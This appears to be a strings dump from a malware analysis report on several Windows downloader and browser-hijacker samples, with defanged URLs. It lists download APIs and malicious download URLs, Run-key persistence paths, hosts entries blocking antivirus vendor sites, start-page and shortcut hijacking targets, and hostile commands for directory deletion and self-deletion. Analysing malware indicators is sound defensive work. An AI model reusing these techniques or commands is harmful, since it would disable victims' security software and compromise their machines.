User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0

Referer: hXXp://%s:80/hXXp://%s

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

%d.%d.%d.%d

%d.%d.%d.%d

192.168.1.244

192.168.1.244

svchost.exe

svchost.exe

ntdll.dll

ntdll.dll

@.reloc

@.reloc

lpk.dll

lpk.dll

cmd /c RD /s /q "%s"

cmd /c RD /s /q "%s"

"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"

"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"

"%s" x "%s" *.exe "%s\"

"%s" x "%s" *.exe "%s\"

cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"

cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"

rar.exe

rar.exe

kmokq.exe_1948:

.text

.text

`.rdata

`.rdata

@.data

@.data

KERNEL32.dll

KERNEL32.dll

EnumWindows

EnumWindows

USER32.dll

USER32.dll

RegCloseKey

RegCloseKey

RegOpenKeyExA

RegOpenKeyExA

ADVAPI32.dll

ADVAPI32.dll

WS2_32.dll

WS2_32.dll

MSVCP60.dll

MSVCP60.dll

MSVCRT.dll

MSVCRT.dll

DeleteUrlCacheEntry

DeleteUrlCacheEntry

WININET.dll

WININET.dll

URLDownloadToFileA

URLDownloadToFileA

urlmon.dll

urlmon.dll

SHLWAPI.dll

SHLWAPI.dll

hXXp://623968.6600.org:99/3.htm

hXXp://623968.6600.org:99/3.htm

201405131714

201405131714

124.232.158.160

124.232.158.160

dk.23145.com

dk.23145.com

Applications\iexplore.exe\SHELL\OPEN\COMMAND

Applications\iexplore.exe\SHELL\OPEN\COMMAND

hXXp://

hXXp://

%s?%c%c%c%c%c

%s?%c%c%c%c%c

%s%c%c%c%c%c.htm

%s%c%c%c%c%c.htm

hXXp://VVV.sfy365.com/1.78

hXXp://VVV.sfy365.com/1.78

hXXp://VVV.yao933.com/

hXXp://VVV.yao933.com/

124.232.141.61

124.232.141.61

QQExtrenal.exe_3124:

.text

.text

`.data

`.data

.rsrc

.rsrc

MSVBVM60.DLL

MSVBVM60.DLL

# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

# 102.54.94.97 rhino.acme.com # source server

# 102.54.94.97 rhino.acme.com # source server

# 38.25.63.10 x.acme.com # x client host

# 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost

127.0.0.1 localhost

127.0.0.1 VVV.ijinshan.com

127.0.0.1 VVV.ijinshan.com

127.0.0.1 VVV.360.cn

127.0.0.1 VVV.360.cn

127.0.0.1 VVV.rising.com.cn

127.0.0.1 VVV.rising.com.cn

127.0.0.1 kaba365.com

127.0.0.1 kaba365.com

xxD.Downloader

xxD.Downloader

VB5!6&vb6chs.dll

VB5!6&vb6chs.dll

D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB

D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB

advapi32.dll

advapi32.dll

RegCreateKeyA

RegCreateKeyA

RegCloseKey

RegCloseKey

VBA6.DLL

VBA6.DLL

c:\windows\system32\jarinet

c:\windows\system32\jarinet

cmd /c taskkill /f /im QQExtrenal.exe

cmd /c taskkill /f /im QQExtrenal.exe

hXXp://

hXXp://

%System%\drivers\etc\hosts

%System%\drivers\etc\hosts

Microsoft.XMLHTTP

Microsoft.XMLHTTP

Adodb.Stream

Adodb.Stream

c:\windows\inf\

c:\windows\inf\

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Run

c:\windows\system32\jarinet\QQExtrenal.exe

c:\windows\system32\jarinet\QQExtrenal.exe

c:\windows\system32\jarinet\QQExtrenal.exe "

c:\windows\system32\jarinet\QQExtrenal.exe "

.exe"

.exe"

xxDown.exe

xxDown.exe

comine.exe_3324:

.text

.text

`.data

`.data

.rsrc

.rsrc

MSVBVM60.DLL

MSVBVM60.DLL

vb6chs.dll

vb6chs.dll

d:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB

d:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB

psapi.dll

psapi.dll

kernel32.dll

kernel32.dll

NTDLL.DLL

NTDLL.DLL

shell32.dll

shell32.dll

SHFileOperationA

SHFileOperationA

ShellExecuteA

ShellExecuteA

VBA6.DLL

VBA6.DLL

1.vbp

1.vbp

hXXp://VVV.hao12338.com/?index

hXXp://VVV.hao12338.com/?index

IEXPLORE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|360SE.EXE|GREENBROWSER.EXE|FIREFOX.EXE|MAXTHON.EXE|THEWORLD.EXE|OPERA.EXE|CHROME.EXE|SAFARI.EXE|NETSCAPE.EXE

IEXPLORE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|360SE.EXE|GREENBROWSER.EXE|FIREFOX.EXE|MAXTHON.EXE|THEWORLD.EXE|OPERA.EXE|CHROME.EXE|SAFARI.EXE|NETSCAPE.EXE

%Program Files%\Windows Media Player

%Program Files%\Windows Media Player

%Program Files%

%Program Files%

explorer.exe

explorer.exe

WScript.Shell

WScript.Shell

Iexplore.exe

Iexplore.exe

wscript.shell

wscript.shell

cmd /c ping 127.0.0.1 -n 2&del

cmd /c ping 127.0.0.1 -n 2&del

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows

%Program Files%\Windows Media Player\comine.exe

%Program Files%\Windows Media Player\comine.exe

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page

%Program Files%\Internet Explorer\iexplore.exe

%Program Files%\Internet Explorer\iexplore.exe

WindowStyle

WindowStyle

Hotkey

Hotkey

serv.dat

serv.dat

news4979.exe_3348:

.text

.text

`.data

`.data

.rsrc

.rsrc

MSVBVM60.DLL

MSVBVM60.DLL

WebBrowser2

WebBrowser2

SHDocVwCtl.WebBrowser

SHDocVwCtl.WebBrowser

WebBrowser1

WebBrowser1

vb6chs.dll

vb6chs.dll

shdocvw.dll

shdocvw.dll

WebBrowser

WebBrowser

4%System%\shdocvw.oca

4%System%\shdocvw.oca

%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB

%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB

advapi32.dll

advapi32.dll

RegCreateKeyA

RegCreateKeyA

RegCloseKey

RegCloseKey

RegOpenKeyA

RegOpenKeyA

RegDeleteKeyA

RegDeleteKeyA

shell32.dll

shell32.dll

ShellExecuteA

ShellExecuteA

psapi.dll

psapi.dll

EnumWindows

EnumWindows

psapi.dll

psapi.dll

RegCreateKeyExA

RegCreateKeyExA

RegOpenKeyExA

RegOpenKeyExA

VBA6.DLL

VBA6.DLL

hXXp:///

hXXp:///

%Program Files%

%Program Files%

@isual Studio\VB98\LINK.EXE.M

@isual Studio\VB98\LINK.EXE.M

1.vbp

1.vbp

yyg.so

yyg.so

hXXp://96xx.net/tj2.html?1114

hXXp://96xx.net/tj2.html?1114

hXXp://wei.96xx.net/index.php?m=weixin&a=order&id=89

hXXp://wei.96xx.net/index.php?m=weixin&a=order&id=89

Chrome_WidgetWin

Chrome_WidgetWin

360se.exe

360se.exe

baidu.com

baidu.com

hao123.com

hao123.com

chrome.exe

chrome.exe

sogouexplorer.exe

sogouexplorer.exe

baidubrowser.exe

baidubrowser.exe

360chrome.exe

360chrome.exe

maxthon.exe

maxthon.exe

qqbrowser.exe

qqbrowser.exe

iexplore.exe

iexplore.exe

\Google Chrome.lnk

\Google Chrome.lnk

\Internet Explorer.lnk

\Internet Explorer.lnk

wscript.shell

wscript.shell

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop

Wscript.shell

Wscript.shell

C:\Users\Public\Desktop\

C:\Users\Public\Desktop\

C:\Users\Public\Desktop

C:\Users\Public\Desktop